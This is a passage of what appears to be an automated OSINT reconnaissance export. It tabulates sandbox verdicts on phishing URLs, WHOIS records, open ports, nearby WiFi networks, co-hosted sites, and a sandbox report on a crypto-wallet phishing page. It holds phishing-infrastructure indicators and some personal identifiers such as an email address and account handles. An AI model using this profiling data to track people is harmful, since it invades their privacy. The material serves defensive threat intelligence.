u'6fa5b98ea302c88b5188162b088f9b4e374c799581571973ea6c5651d9040060', u'type': None, u'type_short': u'url', u'size': 62}, {u'environment_id': 110, u'job_id': u'645c5baae95b4421cb07d5e2', u'analysis_start_time': u'2023-05-11 03:06:18', u'vx_family': u'Phishing site', u'av_detect': u'61', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'c89f9c848a950df9536d3df2ceafaec95f0aa29af4b956a2bfd1dfbbd379cb17', u'type': None, u'type_short': u'url', u'size': 86}, {u'environment_id': 110, u'job_id': u'645c5b9ec8c83d3b240e95c6', u'analysis_start_time': u'2023-05-11 03:06:07', u'vx_family': u'Phishing site', u'av_detect': u'61', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'2b41abf0a1ffd0bfbf700bb5eee65e98fb627cb92c9a148bc3d4acd1a6b24c6e', u'type': None, u'type_short': u'url', u'size': 69}, {u'environment_id': 160, u'job_id': u'645c346964201940820bd22f', u'analysis_start_time': u'2023-05-11 00:18:49', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'6ff193a6ca9551050e9c92179433950b4a1e5c440e0b35cab4b36916f38ab19f', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 100, u'job_id': u'645bdba7396080d9fe10009e', u'analysis_start_time': u'2023-05-10 18:00:07', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'8163eb8a3e42f3967f5831043d6e16ebb5ed541ef09bad6181080ef6e0d7bd2a', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 100, u'job_id': u'645b9d1743bfaa77c207d7d5', u'analysis_start_time': u'2023-05-10 13:33:11', u'vx_family': None, u'av_detect': u'50', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'822a90d8cb0a1a10355a4a70a196e8630d132c645f14cbb143b3f9b7394a251f', u'type': None, u'type_short': u'url', u'size': 114}, {u'environment_id': 110, u'job_id': u'645ae4e1346528d7b70ca2e9', u'analysis_start_time': u'2023-05-10 00:27:14', u'vx_family': u'Phishing site', u'av_detect': u'59', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'ca308e63c510b0b503331cc7778db986b057b684b3dbaa752e4f62cb13664b77', u'type': None, u'type_short': u'url', u'size': 62}, {u'environment_id': 110, u'job_id': u'645ae36a67851ac2340e520d', u'analysis_start_time': u'2023-05-10 00:20:58', u'vx_family': u'Phishing site', u'av_detect': u'60', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'9732e24d121e342e55deabd13611e857c769c96da9717e6d7ebc87449f2a7905', u'type': None, u'type_short': u'url', u'size': 57}, {u'environment_id': 110, u'job_id': u'645ad4ea367c0ebd57074ef9', u'analysis_start_time': u'2023-05-09 23:19:06', u'vx_family': u'Phishing site', u'av_detect': u'60', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'a91d30a9dfbf18fc164f18e29c383f3b3964ac705c585938d8d588d02f3da688', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 110, u'job_id': u'645ad31c5702e95bf3033576', u'analysis_start_time': u'2023-05-09 23:11:24', u'vx_family': u'Phishing site', u'av_detect': u'62', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'e81a2290a3986847ba37b34e8a5c695786daf2ff2a13d86708b03f6647d220ab', u'type': None, u'type_short': u'url', u'size': 62}, {u'environment_id': 100, u'job_id': u'645aa20e7a292c0be70b0612', u'analysis_start_time': u'2023-05-09 19:42:07', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'fac0f6b5c9cc17d9e85e803349fbdcb7dd616c0192e797952d500bc5bd892fe7', u'type': None, u'type_short': u'url', u'size': 141}, {u'environment_id': 160, u'job_id': u'645a76cea2d0c5300e066333', u'analysis_start_time': u'2023-05-09 16:37:35', u'vx_family': None, u'av_detect': u'33', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'c1370cd545c8d3458c340bf48e48850af74876898cb8557ed1a692c1d7654113', u'type': None, u'type_short': u'url', u'size': 123}, {u'environment_id': 100, u'job_id': u'6459c8ee434bd90ac20239bb', u'analysis_start_time': u'2023-05-09 04:15:43', u'vx_family': None, u'av_detect': u'0', u'environment_d | 185.199.108.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NETGEAR (Net ID: 00:0B:7D:08:41:CB) | 39.0469, -77.4903 |
| 2023-05-12 03:32:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.13:80 | 188.114.97.0/24 |
| 2023-05-12 02:45:31 | Raw Data from RIRs | No | PhishStats | 0 | 0 | 2 | 0 | None | [{u'page_text': u' ', u'domain': None, u'virus_total': None, u'n_times_seen_ip': None, u'abuse_contact': None, u'ip': u'185.199.110.153', u'google_safebrowsing': None, u'threat_crowd': None, u'n_times_seen_domain': None, u'alexa_rank_host': None, u'id': 2255774, u'city': u'', u'abuse_ch_malware': None, u'countrycode': u'NL', u'title': u'Site not found \xb7 GitHub Pages', u'ssl_subject': None, u'technology': None, u'date_update': u'2020-12-08T01:50:24.000Z', u'zipcode': u'', u'alexa_rank_domain': None, u'score': None, u'vulns': None, u'latitude': u'52', u'regionname': u'', u'hash': u'05d383e42f69258d635e6789e2a3163ab4e15be5920ead730c050aefc2f422d5', u'threat_crowd_subdomain_count': None, u'screenshot': None, u'n_times_seen_host': None, u'ssl_issuer': None, u'domain_registered_n_days_ago': None, u'regioncode': u'', u'host': u'www.mise-a-jour.github.io', u'date': u'2018-06-06T21:16:47.000Z', u'asn': u'AS54113', u'tags': None, u'bgp': u'185.199.108.0/22', u'url': u'http://www.mise-a-jour.github.io/imp/', u'isp': u'FASTLY - Fastly, US', u'longitude': u'4.89950000', u'ports': None, u'countryname': u'Netherlands', u'threat_crowd_votes': None, u'http_server': None, u'tld': u'io', u'os': None, u'http_code': None}] | 185.199.110.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-timer: S1683860053.987504,VS0,VE2 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 2WIRE623 (Net ID: 00:00:85:F5:03:9F) | 37.7813933,-122.3918002 |
| 2023-05-12 02:46:01 | Physical Location | No | AbstractAPI | 1 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29415, United States, North America | 104.196.30.220 |
| 2023-05-12 03:01:29 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | fluid.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:E3:AC) | 50.1188, 8.6843 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:110 | 87.248.157.102 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01001101ck.github.io | 185.199.111.153 |
| 2023-05-12 02:55:05 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 188.114.97.1 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Collaborative intelligence - Collaborative intelligence characterizes multi-agent, distributed systems where each agent, human or machine, is autonomously contributing to a problem solving network. Collaborative autonomy of organisms in their ecosystems makes evolution possible. | cdn-185-199-111-153.github.com |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WLAN (Net ID: 00:01:24:F3:FD:65) | 34.0544, -118.244 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | home (Net ID: 00:06:25:61:49:C4) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:31:27 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com | Domain Name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com
Updated Date: 2022-10-23T13:11:02.954Z
Creation Date: 2022-09-09T13:47:20.593Z
Registry Expiry Date: 2023-09-09T13:47:20.593Z
Registrar: NAMECHEAP
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Fax: REDACTED FOR PRIVACY
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: wesley.ns.cloudflare.com
Name Server: rachel.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN RDDS Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:16.270Z <<<
For more information on domain status codes, please visit https://icann.org/epp
The WHOIS information provided in this page has been redacted
in compliance with ICANN's Temporary Specification for gTLD
Registration Data.
The data in this record is provided by Uniregistry for informational
purposes only, and it does not guarantee its accuracy. Uniregistry is
authoritative for whois information in top-level domains it operates
under contract with the Internet Corporation for Assigned Names and
Numbers. Whois information from other top-level domains is provided by
a third-party under license to Uniregistry.
This service is intended only for query-based access. By using this
service, you agree that you will use any data presented only for lawful
purposes and that, under no circumstances will you use (a) data
acquired for the purpose of allowing, enabling, or otherwise supporting
the transmission by e-mail, telephone, facsimile or other
communications mechanism of mass unsolicited, commercial advertising
or solicitations to entities other than your existing customers; or
(b) this service to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registrar or any
Registry except as reasonably necessary to register domain names or
modify existing domain name registrations.
Uniregistry reserves the right to modify these terms at any time. By
submitting this query, you agree to abide by this policy. All rights
reserved.
Domain name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-09-09T13:47:20.59Z
Registrar Registration Expiration Date: 2023-09-09T13:47:20.59Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Name Server: rachel.ns.cloudflare.com
Name Server: wesley.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T15:09:16.51Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:44:19 | IPv6 Address | No | DNS Resolver | 15 | 0 | 3 | 0 | None | 2600:1f18:2489:8200::c8 | funny.battleb0t.xyz |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | eliaspinheironeto.github.io | 185.199.108.153 |
| 2023-05-12 03:34:36 | Netblock Membership | No | RIPE | 5 | 0 | 3 | 0 | None | 45.131.109.0/24 | 45.131.109.53 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Disqus (Category: social)
https://disqus.com/by/Altpapier/ | Altpapier |
| 2023-05-12 02:55:25 | Social Media Presence | No | Social Network Identifier | 0 | 0 | 4 | 0 | None | Github: https://github.com/Altpapier/SkyHelperAPI/issues | https://github.com/Altpapier/SkyHelperAPI/issues |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.224): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.43): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:38 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01-edu.github.io |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | zoom (Net ID: 00:01:38:3F:26:0C) | 40.2024, 29.0398 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Teespring (Category: business)
https://login.creator-spring.com | login |
| 2023-05-12 03:00:58 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.96): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless2 (Net ID: 00:01:36:03:07:83) | 52.3759, 4.8975 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:42:50) | 41.8781, -87.6298 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TechAir (Net ID: 00:01:21:30:60:FE) | 41.8781, -87.6298 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:62:CF:8A) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:14 | HTTP Status Code | No | Web Spider | 0 | 1 | 2 | 0 | None | 403 | kekw.battleb0t.xyz |
| 2023-05-12 02:44:15 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | funny.battleb0t.xyz |
| 2023-05-12 02:47:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.108.153:443 | 185.199.108.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:7B:56:15) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 7732 1224 (Net ID: 00:0F:CC:FD:AD:58) | 32.8608, -79.9746 |
| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | jhruby.web@gmail.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/walletconnect/walletconnect-monorepo/releases/download/1.7.8/web3-provider.min.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/twbs/bootstrap/blob/master/js/modal.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/jkup/focusable/blob/master/index.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://lens-protocoll.xyz/webc/index.php', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_588_IESQMMUTEX_0_519"\n "IsoScope_588_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_588_IESQMMUTEX_0_331"\n "IsoScope_588_IE_EarlyTabStart_0xea0_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1416"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_588_ConnHashTable<1416>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_588_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.6.70:443"\n "104.17.25.14:443"\n "69.16.175.10:443"\n "65.8.158.85:443"\n "151.101.1.229:443"\n "104.16.123.175:443"\n "192.30.255.113:443"\n "185.199.108.153:443"\n "185.199.108.133:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.ethers.io"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "etherum-libs.github.io"\n "github.com"\n "lens-protocoll.xyz"\n "objects.githubusercontent.com"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "unpkg.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta name="Keywords" content="Lens Protocol - Claiming App\n Lens Protocol - Claiming App a paypal\n Lens Protocol - Claiming App a binance\n Lens Protocol - Claiming App harmony"/>" (Indicator: "dir "; File: "urlref_httpslens-protocoll.xyzwebcindex.php")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'"(0, properties_1.defineReadOnly)(this, "publicKey", signingKey.compressedPublicKey);" (Source: jqueryjs_1_.js, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dffb9a278b09a9867d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{64fca9ab-eac7-11ed-8a3e-080027a190c2}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"b38d7abaf0f5f8fb484f9be1484e98a17ea16df2_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f0438febff768476c4bd646204034239a5fc20d9_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f9fa0444b908def7e2cacce9c162c39a60167a27_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "jqueryjs_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3.min_1_.js" has type "data"- [targetUID: N/A]\n "slider_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3-provider.min_1_.js" has type "data"- [targetUID: N/A]\n "ethers-5.2.umd.min_1_.js" has type "data"- [targetUID: N/A]\n "walletbundle_1_.js" has type "UTF-8 Unicode text with very long lines with escape sequences"- [targetUID: N/A]\n "index_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ethereumjs-tx-1.3.3.min_1_.js" has type "data"- [targetUID: N/A]\n "urlref_httpslens-protocoll.xyzwebcindex.php" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "index_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "sweetalert2.all_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "jquery-3.6.0.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "dark_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001416]\n "invisible_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "main.34d2eea7_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "axios.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ABI_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001416]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF038CF0017F8B478D.TMP" has type "data"- Location: [%TEMP%\\~DF038CF0017F8B478D.TMP]- [targetUID: 00000000-00001416]\n "~DFFB9A278B09A9867D.TMP" has type "data"- Location: [%TEMP%\\~DFFB9A278B09A9867D.TMP]- [targetUID: 00000000-00001416]\n "~DF79C8B99757FDF652.TMP" has type "data"- Location: [%TEMP%\\~DF79C8B99757FDF652.TMP]- [targetUID: 00000000-00001416]\n "~DF3E2144E69F260778.TMP" has type "data"- Location: [%TEMP%\\~DF3E2144E69F260778.TMP]- [targetUID: 00000000-00001416]\n "favicon_1_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "css2_1_.css" has type "ASCII text"- [targetUID: N/A]\n "_64FCA9AB-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._64FCA9A9-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6E587A84-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "inter_1_.css" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 